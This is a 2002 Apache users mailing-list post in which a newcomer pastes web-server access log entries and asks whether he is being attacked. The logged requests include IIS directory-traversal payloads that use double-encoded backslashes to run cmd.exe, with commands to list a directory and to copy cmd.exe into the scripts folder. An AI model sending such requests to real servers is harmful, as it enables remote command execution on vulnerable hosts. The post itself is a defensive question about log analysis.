httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "H. Carter Harris" <carter-li...@technettn.net>
Subject [users@httpd] Hacker?
Date Thu, 05 Dec 2002 02:11:39 GMT
I have a test apache system where I am trying to learn how to use it.  I got
the access_log file working and I noticed the following entries in the log:

66.137.7.57 - - [02/Dec/2002:19:49:26 -0500] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
61.56.232.58 - - [02/Dec/2002:19:49:53 -0500] "HEAD / HTTP/1.0" 404 0
208.47.206.2 - - [02/Dec/2002:22:01:40 -0500] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.
exe+c:\inetpub\scripts\script.exe HTTP/1.1" 404 246
207.198.31.238 - - [03/Dec/2002:00:15:16 -0500] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.
exe+c:\inetpub\scripts\script.exe HTTP/1.1" 404 246
195.92.95.61 - - [03/Dec/2002:05:16:21 -0500] "HEAD
/cobalt-images/welcome2.gif HTTP/1.0" 404 0
202.62.83.82 - - [03/Dec/2002:10:25:49 -0500] "HEAD / HTTP/1.0" 404 0
6

This installation is on a Mandrake Linux box, not NT.  Is someone trying to
hack into the system?



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message